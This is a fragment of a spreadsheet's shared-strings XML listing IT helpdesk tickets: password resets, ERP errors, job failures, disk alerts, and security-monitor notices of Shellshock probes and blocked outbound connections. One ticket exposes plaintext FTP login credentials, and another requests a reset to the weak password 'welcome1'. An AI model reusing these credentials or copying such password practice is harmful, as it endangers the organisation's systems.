    <t>reset the password for aliuytre j love-lewis on other / caas applications</t>
  </si>
  <si>
    <t>i would like to reset my caas applications (remote and desktop connection) password.  itylnjqw kqiurhbt and thomklmas brrgtyant handles these request in our office .it is apart of the customer interaction phone system.</t>
  </si>
  <si>
    <t>ms outlook issue: ms crm dynamics issue</t>
  </si>
  <si>
    <t>ubkgydpw pqljsube</t>
  </si>
  <si>
    <t>440 
summary:i don't think i am receiving my email</t>
  </si>
  <si>
    <t>fyigcxnm utgeyfsm</t>
  </si>
  <si>
    <t>dev/software file system on HostName_184 has consumed 86% of space</t>
  </si>
  <si>
    <t>virus detected on pc</t>
  </si>
  <si>
    <t>virus detected on pc. please see attachment.</t>
  </si>
  <si>
    <t xml:space="preserve">erp  ecs tracking is not working resp. computer crashes </t>
  </si>
  <si>
    <t>erp  ecs tracking is not working resp. computer crashes immediately when trying to get proof of delivery for ups shipments._x000D_
_x000D_
del. note - header - ecs tracking and when clicking on proof of delivery erp stops  - tried several times - always the same</t>
  </si>
  <si>
    <t>bsglvkdz twoibenz</t>
  </si>
  <si>
    <t>account unlock request from herr schmidt : dnc430</t>
  </si>
  <si>
    <t>unable to access the lunch menu on the hub</t>
  </si>
  <si>
    <t xml:space="preserve">email:
from: renyhtuee a meayhtger 
sent: thursday, august 18, 2016 5:10 pm
to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;
subject: fw: renyhtuee a meayhtger wants to access 'lunch-menus'
can someone check on why i can't access lunch menus?  did something change in collaboration_platform?  this should be available to everyone!
best </t>
  </si>
  <si>
    <t>not able to login to hub</t>
  </si>
  <si>
    <t>not able to login to hub_x000D_
_x000D_
helped with email address and asked her to user after some time.</t>
  </si>
  <si>
    <t>feavxrlb krdhzfgc</t>
  </si>
  <si>
    <t>zjkqxsye bcsdlfuj</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access collaboration_platform it homepage - </t>
  </si>
  <si>
    <t>error: access denied (screenshot attached)._x000D_
confirmed that gso and security admin team members are unable to access, possibly others as well._x000D_
_x000D_
informed gvxfymjk euioadyf and khadfhty who are currently investigating._x000D_
_x000D_
we are able to access other sites including cor relations, finance, markhtyeting and the gso subsite as well when accessed directly through url</t>
  </si>
  <si>
    <t>canÂ´t do pgi for mm 5316075</t>
  </si>
  <si>
    <t xml:space="preserve">+49 
SID_34 
error: item category  is not defined     message  -  no. vl324
i canÂ´t do the pgi for :
9168049095
8057945735
9168049015
 </t>
  </si>
  <si>
    <t>snipping tool shortcut</t>
  </si>
  <si>
    <t xml:space="preserve">ic: welcome, our next available agent will be with you shortly..._x000D_
ic: interaction alerting agent._x000D_
aytjedki rucfxpla: uacyltoe hxgaycze_x000D_
aytjedki rucfxpla: this is sabrthy_x000D_
ic: website visitor has joined the conversation_x000D_
efbwiadp dicafxhv: hello sabrthy_x000D_
efbwiadp dicafxhv: its working fine# _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/18/2016 08:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/18/2016 08:11:00</t>
  </si>
  <si>
    <t>uyjglskh lhurepnw</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00</t>
  </si>
  <si>
    <t>HostName_173(erp - SID_8):  average (1 samples) disk free on /home is now 12%, which is below the warning threshold (15%)</t>
  </si>
  <si>
    <t>HostName_173(erp - SID_8): average (1 samples) disk free on /home is now 12%, which is below the warning threshold (15%) out of total size 0.0 gb</t>
  </si>
  <si>
    <t>business_client &amp; erp gui issue</t>
  </si>
  <si>
    <t>a couple of users (nmzfdlar whzbrusx, uwdqtrnx uhntgvyj) have reported the attached error when using the transaction code zwwirep.</t>
  </si>
  <si>
    <t>qlhmawgi sgwipoxn unlock request : nk_prod</t>
  </si>
  <si>
    <t>bedzliqs xazbjvmc</t>
  </si>
  <si>
    <t xml:space="preserve">possible bash command injection attempt </t>
  </si>
  <si>
    <t xml:space="preserve">dsw in33637966_x000D_
_x000D_
we are seeing '50990 vid63154 possible bash command injection attempt - bash in http header (incoming)' alerts being generated by your isensor03.company.com/10.32.100.17 device indicating that one or more hosts, including 220.202.123.178, are attempting to discover whether one of your internet-facing devices, including 10.250.1.13/clhqsm010, is vulnerable to a bash shell remote code execution vulnerability (cve-2014-6271). successful exploitation of these vulnerabilities may result in information disclosure or remote code execution. as the traffic in these alerts indicates an attempt to exploit said application, we are escalating this matheywter to you via a medium priority ticket. _x000D_
 _x000D_
blocking each source ip address may not be productive due to attackers' ability to switch ip addresses through the use of proxies, anonymizing software such as tor, and vpns. please investigate your environment to determine whether you are running a vulnerable version of the application being targeted. </t>
  </si>
  <si>
    <t>'internal outbreak for 7/udp'</t>
  </si>
  <si>
    <t xml:space="preserve">dsw in33638260_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 54.96.80.216/att-singapore-asa.company.com-1 device generating at least 254 'internal outbreak for 7/udp' alerts within 10 minutes, for traffic (blocked) from awyl9912395/10.38.28.239 to port 7/udp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t>
  </si>
  <si>
    <t>dsw in33638700_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from ldgl8513807/10.24.14.230 to port 135/tcp (remote procedure call (rpc)) of external host 220.250.64.225.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</si>
  <si>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 xml:space="preserve">machine stuck on welcome screen </t>
  </si>
  <si>
    <t>rma customer return error</t>
  </si>
  <si>
    <t>billing 0158655822 , inwarehouse_tool 415464 _x000D_
customer return not processed correctly_x000D_
when input billing 0158655822, the material isn't copied from the reference.</t>
  </si>
  <si>
    <t>cxfrvtyn rapoejyb</t>
  </si>
  <si>
    <t>urgent : user : vvspecmfrt : please reactivate account.</t>
  </si>
  <si>
    <t>user : vvspecmfrt : please reactivate account._x000D_
_x000D_
from 18.august.2016 till 28.february.2017 it should be active.</t>
  </si>
  <si>
    <t>monitor on rqxw8515251 is out.</t>
  </si>
  <si>
    <t>very urgent: reset windows password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oslzvpgk.nhwsxgpb@gmail.com
good day
htnvbwxs gwfrzuex has already issued a ticket for this â€“ please address aerp!
please reset windows password for rhgteini
</t>
  </si>
  <si>
    <t>outlook does not open.</t>
  </si>
  <si>
    <t>password cannot changed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tbukjcyl.lxncwqbj@gmail.com_x000D_
_x000D_
dear all_x000D_
could you please help me to fix it,_x000D_
_x000D_
[cid:image001.jpg@01d1f978.729627d0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>tbukjcyl lxncwqbj</t>
  </si>
  <si>
    <t xml:space="preserve">tess installation </t>
  </si>
  <si>
    <t>attendance_tool password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dwafrmth.oabwzitv@gmail.com
hi
i have forgotten the attendance_tool password my user id is 20452489
with best </t>
  </si>
  <si>
    <t>issue in business_client</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eakhgxbw.pfyadjmb@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
i am facing issue in opening business_client._x000D_
_x000D_
getting following error msg._x000D_
_x000D_
pl help on this._x000D_
[cid:image009.jpg@01d1f967.2e19de50]_x000D_
</t>
  </si>
  <si>
    <t>mitarbeiter reichenberg philipp benÃ¶tigt berechtigung fÃ¼r den ordner file:///m:\ce_leiter</t>
  </si>
  <si>
    <t xml:space="preserve">printer not working </t>
  </si>
  <si>
    <t>reset the password for fniqhjtg qrfuetpw on windows login</t>
  </si>
  <si>
    <t>please reset users windows password to welcome1, as she is having issues logging in.</t>
  </si>
  <si>
    <t>drucker an messmaschine r173 in halle b hat stÃ¤ndig papierstau.</t>
  </si>
  <si>
    <t>access new payroll site</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cvqnstgu.ofnimlwx@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
i have been having an issue with being able to gain access to make approvals for our new payroll site._x000D_
_x000D_
they have advised the issue is with my browser._x000D_
_x000D_
below is the email trail on the issue._x000D_
_x000D_
can i get some assistance to rectify the problem?i don't want to download the wrong browser._x000D_
_x000D_
_x000D_
to all_x000D_
_x000D_
who should i contact to resolve this issue?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>not able to see drawings in business_client</t>
  </si>
  <si>
    <t>not able to view/download tool drawings over business_client.
summary:business_client - refer call by mr. dwfiykeo argtxmvcumar</t>
  </si>
  <si>
    <t>please help</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iqmhjlwr.jqmxaybi@gmail.com_x000D_
_x000D_
please can you help me. i am experiencing nearly 90 min delay on my incoming e-mails as per below screenshot_x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d1f93f.11ea7910]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>win installation image for russia office</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: koahsriq.wdugqatr@gmail.com
good day all
we need to rebuild 1 win 7 laptop and 1 new with win 7 image. could you please download actual images on our ftp (credential below)? usually romftguald helping us with this kind of downloading but now he is unavailable
ftp:\\ftp.terralink.ru
login: company
password: companymet@l
Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,
ÐµÐ²Ð³ÐµÐ½Ð¸Ñ.
koahsriq wdugqatr,
administrative assistant.
koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;
</t>
  </si>
  <si>
    <t>mail access in mobile</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rsvminjz.tcpqvbae@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
provide me the mail access for mobile. encl the details._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>the attached 7 initiatives in "director approved" status, but cannot be released</t>
  </si>
  <si>
    <t>per subject, i have changed the status to "director approved", but cannot release. error message "enter channel manager", but in account details, the cm is available. can you please solve?</t>
  </si>
  <si>
    <t>mqzirjkb umbgreyq</t>
  </si>
  <si>
    <t>erp login issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: csmtowqn.ulpjtgfo@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
iam getting the below error while trying to login. kindly help._x000D_
_x000D_
[cid:image001.png@01d1f958.2cf09e60]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>csmtowqn ulpjtgfo</t>
  </si>
  <si>
    <t>purchasing zitec catalogue does not work in SID_34</t>
  </si>
  <si>
    <t>whenn accessing the catalog the company logon data are missing (userid and password are not given)_x000D_
in SID_1 it works in SID_34 not. please check.</t>
  </si>
  <si>
    <t>installation of engineering tool/engineering_tool/google chrome/winrar/</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: irqpwgtn.dpautgeh@gmail.com_x000D_
_x000D_
dear concern,_x000D_
_x000D_
please install all related apps to my laptop as i got new laptop._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>sipppr routing to demand planners not working ... sippprs get routed to admin</t>
  </si>
  <si>
    <t>as of this morning, the routing for sippprs to demand planners seems to be broken.</t>
  </si>
  <si>
    <t>netzteil an der docking station ohne funktion.</t>
  </si>
  <si>
    <t xml:space="preserve">netzteil an der docking station ohne funktion._x000D_
_x000D_
ext : 673_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">browserproblem mit hub </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: mnakehrf.mvunqihf@gmail.com
guten tag,
the hub lÃ¤sst sich an meinem rechner nicht Ã¶ffnen.
der bildschirm â€žbaut" sich nicht auf. einige wenige male funktioniert es.
auf anderen rechnern funktioniert es. browserproblem?
[cid:image001.png@01d1f935.373777e0]
mit freundlichen grÃ¼ÃŸen
mnakehrf mvunqihf
analyst payroll
mnakehrf.mvunqihf@gmail.com&lt;mailto:mnakehrf.mvunqihf@gmail.com&gt;
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>mnakehrf mvunqihf</t>
  </si>
  <si>
    <t>not able to sign in collaboration_platform,</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qubywmgf.jouickqx@gmail.com
that didn't work
we're sorry, but qubywmgf.jouickqx@gmail.com can't be found in the company.collaboration_platform.com directory. please try again later, while we try to automatically fix this for you.
here are a few ideas:
[
click here to sign in with a different account to this site.&lt;javascript:loginasanother('\u002f_layouts\u002fcloseconnection.aspx?loginasanotheruser=true\u0026source=\u00252f',1)&gt;
this will sign you out of all other office 365 services that you're signed into at this time.
[
if you're using this account on another site and don't want to sign out, start your browser in private browsing mode for this site (show me how)&lt;
if that doesn't help, contact your support team and include these technical details:
correlation id: 01ec9a9d-7035-2000-1602-ce2ff57c84f1
date and time: 8/18/2016 12:35:10 am
url: 
user: qubywmgf.jouickqx@gmail.com
issue type: user not in directory.
for company
athjyul dixhtyuit
senior manager sales - north ( msg)
qubywmgf.jouickqx@gmail.com&lt;mailto:qubywmgf.jouickqx@gmail.com&gt;
companytm
</t>
  </si>
  <si>
    <t>telephony_software-software upgrade funktioniert nicht</t>
  </si>
  <si>
    <t xml:space="preserve">telephony_software-software upgrade funktioniert nicht. pc: empl8111412_x000D_
vor dem start des upgrades wurden alle programdntyme geschlossen._x000D_
nach dem start des upgrades erschien folgende fehlermeldung "wusa.exe - anwendungsfehler" (siehe datei)_x000D_
nach der bestÃ¤tigung mit "ok" wurde anwendung geschlossen und der upgrade nicht durchgefÃ¼hrt._x000D_
_x000D_
translation : _x000D_
telephony_software software upgrade does not work. pc: empl8111412_x000D_
before starting the upgrade, all programdntys have been closed._x000D_
after starting the upgrade following error message appeared "wusa.exe - application error" (see file)_x000D_
after confirming with "ok" application is closed and the upgrade is not performed._x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1338</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1338 at 08/18/16 02:54:34</t>
  </si>
  <si>
    <t>ZkBogxib QsEJzdZO</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1388</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1388 at 08/18/16 02:54:34</t>
  </si>
  <si>
    <t>tess issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ufgkybsh.ijswtdve@gmail.com_x000D_
_x000D_
dear sir/mam,_x000D_
_x000D_
i am facing issue with tess software. kindly help me to resolve the issue._x000D_
_x000D_
[cid:image001.jpg@01d1f94b.49e78c70]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1332</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1332 at 08/18/16 02:51:35</t>
  </si>
  <si>
    <t>engineering_tool not opening</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qmpyjfbn.zlyiwtch@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please help to resolve the below issue while opening engineering_tool, will be available in office for next 1 hour._x000D_
_x000D_
[cid:image001.jpg@01d1f947.8d282e30]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qmpyjfbn zlyiwtch</t>
  </si>
  <si>
    <t>wireless access point prÃ¼fen geb.14 ,geb16 und konferenzraum geb.2 \xmlbfjpg yegzbvru</t>
  </si>
  <si>
    <t>business_client error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zcyueotq.ehvpaqnf@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
i am getting below error when i open business_client_x000D_
_x000D_
[cid:image004.jpg@01d1f946.9ca4fba0]_x000D_
_x000D_
_x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>zcyueotq ehvpaqnf</t>
  </si>
  <si>
    <t>probleme mit lan \ewew8323735 \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>probleme mit lan  \ewew8323862 \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>wireless access point funktioniert nicht \jxphgfmb gjbtuwek</t>
  </si>
  <si>
    <t>vnc-zugriff auf empwx000189 (sk-presserei germany) geht nicht mehr</t>
  </si>
  <si>
    <t>fehlermeldung "failed to connect to server". lt. kollegen in der sk-presserei ist die pc-nummer aber richtig, und der pc wurde auch nicht ausgetauscht oder erneuert. danke!</t>
  </si>
  <si>
    <t>goods movement mb11</t>
  </si>
  <si>
    <t xml:space="preserve">hello,
please let me know how to conduct goods movement with mb11 for mm#6545035 / 6100063 which are not accepted.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
æ ªå¼ä¼šç¤¾ã€€ã‚¨ã‚¯ã‚¹ãƒ„ãƒ«ãƒ¼ãƒ‰ãƒ›ãƒ¼ãƒ³
ãƒ—ãƒ­ã‚¸ã‚§ã‚¯ãƒˆã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢
ç”°æ‘ã€€å°šä¿Š
iwazgesl ydgqtpbo
project engineer &amp; supply chain logistics
company k.k.
e-mail: iwazgesl.ydgqtpbo@gmail.com
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
ï¼ˆå¼Šç¤¾ã¯2016å¹´1æœˆ1æ—¥ã‚ˆã‚Šä¼šç¤¾åã‚’æ ªå¼ä¼šç¤¾ã‚¨ã‚¯ã‚¹ãƒ„ãƒ«ãƒ¼ãƒ‰ãƒ›ãƒ¼ãƒ³ã¸å¤‰æ›´è‡´ã—ã¾ã—ãŸã€‚ï¼‰
</t>
  </si>
  <si>
    <t xml:space="preserve">cancel migo entry  for po5018096568 (5321) </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: neokfwiy.ufriscym@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
due to the goods delivery issue by plant_298, please help to reverse the migo entry  material doc. 6126951797 /accounting doc. 6111167039, also need you help to reverse the good issue doc. 5011169990, the d/n 9168984815 has been cancelled._x000D_
_x000D_
[cid:image002.png@01d1f956.6d0ac0e0]_x000D_
_x000D_
[cid:image003.png@01d1f956.fb694960]_x000D_
_x000D_
[cid:image001.png@01d1f957.983fbd00]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>ç”µè„‘å¡ä¸”è¿žä¸ä¸Šå†…ç½‘</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tuqrvowp.fxmzkvqo@gmail.com
ç”µè„‘å¡ä¸”è¿žä¸ä¸Šå†…ç½‘ï¼Œè¯·è½¬è´ºæ­£å¹³
tuqrvowp fxmzkvqo é’±å”é‘«
human resources
tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;
ä¸­å›½ä¸Šæµ·å¥‰è´¤é™ˆæ¡¥è·¯1508å·
</t>
  </si>
  <si>
    <t>fe08 doesn't work in erp</t>
  </si>
  <si>
    <t xml:space="preserve">when i print oa in erp and choose the fe08, fe08 doesn't work . but it's work when i print excel/word/pdf files .
my erp id:wrtyuh2  
the matheywter is also happened with  erp id: fufrtal.
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1148</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1148 at 08/18/16 01:15:32</t>
  </si>
  <si>
    <t xml:space="preserve">configuration of knowledge center </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rnueobcz.lwhcbati@gmail.com_x000D_
_x000D_
please add/connect the below mail id to my outlook._x000D_
i need access to send &amp; receive the emails. it should work with both mine &amp; gslpdhey ksiyurvlir's outlook._x000D_
_x000D_
-knowledge.center@company.com&lt;mailto:-knowledge.center@company.com&gt;_x000D_
w-in-knowledge.center@company.com&lt;mailto:w-in-knowledge.center@company.com&gt;_x000D_
_x000D_
action request urgent._x000D_
_x000D_
thanking you_x000D_
</t>
  </si>
  <si>
    <t>interface down ::usa switch :: bottom-6509-msfc720 switch since  8/17/2016 11:46 pm est</t>
  </si>
  <si>
    <t xml:space="preserve">  interface down ::bottom-6509-msfc720 switch since  8/17/2016 11:46 pm est_x000D_
_x000D_
switch description:_x000D_
_x000D_
gigabitethernet4/14 Â· infoblox trinzic 1420 dns node 2 ha 10.32.1.10 / vip 10.32.1.11</t>
  </si>
  <si>
    <t>reset passwords for ezrsdgfc hofgvwel using password_management_tool password reset.</t>
  </si>
  <si>
    <t>ezrsdgfc hofgvwel</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1141</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1141 at 08/17/16 23:45:30</t>
  </si>
  <si>
    <t>help to install the network printer on the laptop</t>
  </si>
  <si>
    <t>telephony_software è½¯ä»¶å‡çº§åŽ, æ‰“å°æ–‡ä»¶æ—¶-prtpu07 æ‰“å°æœºæç¤ºé”™è¯¯ã€‚</t>
  </si>
  <si>
    <t>telephony_software è½¯ä»¶å‡çº§åŽ, æ‰“å°æ–‡ä»¶æ—¶-prtpu07 æ‰“å°æœºæç¤ºé”™è¯¯ï¼Œæ— æ³•æ‰“å°åˆ°æ‰“å°æœºã€‚</t>
  </si>
  <si>
    <t>tdsmnuib entgzrhy</t>
  </si>
  <si>
    <t>inquiry for adding digital signature in pdf</t>
  </si>
  <si>
    <t>unable to launch business_client, getting microsoft.net error</t>
  </si>
  <si>
    <t>HostName_1045: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%).</t>
  </si>
  <si>
    <t>HostName_1045: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%). out of total size 100.0 gb</t>
  </si>
  <si>
    <t>HostName_973: total cpu is now 100.00%, which is above the error threshold (99%)</t>
  </si>
  <si>
    <t>HostName_973: average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)</t>
  </si>
  <si>
    <t>lhqsm518: hrsync sync failed!  no sync detected in the last 24 hours...please investigate</t>
  </si>
  <si>
    <t>email contacts issue</t>
  </si>
  <si>
    <t>email contacts issue_x000D_
-connected to the user system using teamviewer._x000D_
-deleted the ms crm and reconfigured the mscrm._x000D_
-restarted the pc and reconfigured the outlook._x000D_
-caller confirmed that he is now able to see the emails on outlook._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>dell 7350: monitor display issue.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1852</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1852 at 08/17/16 17:18:31</t>
  </si>
  <si>
    <t>ess problems - expense report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jnqmvard.jiazxvcl@gmail.com_x000D_
_x000D_
i am trying to do my expense report thru ess and it's not working, a blank screen pop up after i click oon the expense report link_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jnqmvard jiazxvcl</t>
  </si>
  <si>
    <t>i cannot receive calls through telephony_software. the call comes through, and rings one time, then goes to warehouse_toolmail. i closed telephony_software and</t>
  </si>
  <si>
    <t>name:tfgtodd panelfgt
language:
browser:microsoft internet explorer
email:lwbchnga.axpqctfr@gmail.com
customer number:
telephone:803
summary:hello. i cannot receive calls through telephony_software. the call comes through, and rings one time, then goes to warehouse_toolmail. i closed telephony_software and rebooted my phone, and it is still doing this.</t>
  </si>
  <si>
    <t>please reset your security to the collaboration_platform lagp area</t>
  </si>
  <si>
    <t>gylicjpx owlrismj</t>
  </si>
  <si>
    <t>cannot see receipts for travel reimbursement</t>
  </si>
  <si>
    <t>the link to see receipts and reimbursement form submitted by team member is broken in mss.</t>
  </si>
  <si>
    <t xml:space="preserve">i need access to netweaver drawings.  i also need erp access for nxd type drawings.  i am being denied access in erp </t>
  </si>
  <si>
    <t>unable to access drawings in erp.  need access to net weaver</t>
  </si>
  <si>
    <t>security incidents - ( in33426117 ) : correlation rule triggered: icmp ping failure</t>
  </si>
  <si>
    <t>related events: _x000D_
____________________________________________________________________________x000D_
event id: 80657337_x000D_
event summary: [hw] service icmp/icmp is down_x000D_
source ip: 10.44.86.12_x000D_
source hostname: ap-f5_x000D_
destination hostname: _x000D_
device ip: 10.44.86.12_x000D_
device name: ap-f5.company.com_x000D_
event extra data:_x000D_
inspectorruleid = 2132464_x000D_
sherlockruleid = 566281_x000D_
ileatdatacenter = true_x000D_
srchostname = ap-f5_x000D_
foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;808333:0.5001:0.0061|ngm:0.9619:0.0008;_x000D_
foreseeinternalip = 10.44.86.12_x000D_
irreceivedtime = 1469623856316_x000D_
foreseeconndirection = internal_x000D_
inspectoreventid = 860011815_x000D_
_x000D_
_x000D_
occurrence count: 1_x000D_
event count: 1_x000D_
_x000D_
event detail:_x000D_
from 46.45.62.5144 for device 10.44.86.12 summary: service icmp/icmp is down_x000D_
detail: service check failed! (100% failures)_x000D_
(icmp-echo) unable to ping 10.44.86.12</t>
  </si>
  <si>
    <t>need to get the expense reports direct deposited as well?</t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
rakthyesh ramdntythanjesh
 hi kylfgte
kylfgte
 hello!
 how are you today?
rakthyesh ramdntythanjesh
 i am doing great, how about you
kylfgte
 good </t>
  </si>
  <si>
    <t>cyhiwbru nsfroezg</t>
  </si>
  <si>
    <t>security incidents - ( #in33417637 ) : repeat outbound connection for 135/tcp from 10.16.143.221</t>
  </si>
  <si>
    <t>source ip :10.16.143.221
destination ip: 31.199.53.9
system name :edml8111119
user  name: ptczqbdw ybaoluck(dalgtylam)
location :milano ds
sep , sms status :no updates
field sales user ( yes / no) :  no
dsw event log:see below
----------------------------------------------------------------
=========================
event data
=========================
related events: 
___________________________________________________________________________
event id: 70619902
event summary: repeat outbound connection for 135/tcp
log time: 2016-07-26 at 15:46:55
source ip: 10.16.143.221
source hostname: edml8111119
destination ip: 31.199.53.9
destination hostname: host9-53-static.199-31-b.business.telecomitalia.it.
device ip: 80.71.06.702
device name: company-european-asa.company.com-1
event extra data:
inspectorruleid = 186739
cvss = -1
sherlockruleid = 237526
ctainstanceid = 0
irreceivedtime = 1469548921441
inspectoreventid = 619150866
eventtypepriority = 1
foreseeinternalip = 10.16.143.221
logtimestamp = 2570659126
foreseeconndirection = outgoing
srcassetofinterest = 267
foreseeexternalip = 31.199.53.9
ontologyid = 200020003203009162
srchostname = edml8111119
eventtypeid = 200020003203009062
proto = tcp
dstport = 135
action = blocked
ileatdatacenter = true
foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;808333:0.0038:0.0061|ngm:0.0055:0.0061;
foreseedstipgeo = rome,ita
agentid = 103761
srcmacaddress = 0a:f5:9a:d1:3d:17:00:00:00:00:00:00:00:00:00:00
srcport = 65364
occurrence count: 177
event count: 1
event detail:
jul 26 15:46:55 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.143.221/65364 dst noris:31.199.53.9/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
[correlation_data]
jul 26 05:17:23 60.43.89.120 dhcpd[12402]: dhcpack on 10.16.143.221 to 0a:f5:9a:d1:3d:17:00:00:00:00:00:00:00:00:00:00 (edml8111119) via eth2 relay 10.16.4.26 lease-duration 28800</t>
  </si>
  <si>
    <t>our server is getting full again. i have found 27g that i can erase, but that won't last too long. can you help?</t>
  </si>
  <si>
    <t>name:schtrtgoyht
language:
browser:microsoft internet explorer
email:shpnkgir.mpsycbxl@gmail.com
customer number:
telephone:   ext 2335
summary:our server is getting full again. i have found 27g that i can erase, but that won't last too long. can you help?
server :  ldsm003</t>
  </si>
  <si>
    <t xml:space="preserve">can't open outlook , i had same issues earlier this week </t>
  </si>
  <si>
    <t>HostName_108: disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 80.0 gb</t>
  </si>
  <si>
    <t>HostName_108: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 80.0 gb</t>
  </si>
  <si>
    <t>it assistance. need access usaed to collaboration_platform lagp link.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mgcivbtx.bshmfxya@gmail.com_x000D_
_x000D_
it,_x000D_
_x000D_
i currently cannot access the lagp form (hyperlink) in collaboration_platform. suomfxpj izcwuvgo stated i need to contact it for usaed access._x000D_
_x000D_
i clickâ€¦_x000D_
_x000D_
_x000D_
and receiveâ€¦_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">blade chassis HostName_1170 (ip 79.40.48.896) is reporting "non critical" hardware issues. </t>
  </si>
  <si>
    <t xml:space="preserve">hi team, _x000D_
_x000D_
with the new functionality and features that monitoring_tool provides us, we have started monitorixepyfbga wtqdyoinware sensors. we started receiving alerts for the HostName_1170 blade chassis (79.40.48.896). the iom sensor and in turn the chassis is reporting some "non critical" alerts. could you please investigate and advise? _x000D_
</t>
  </si>
  <si>
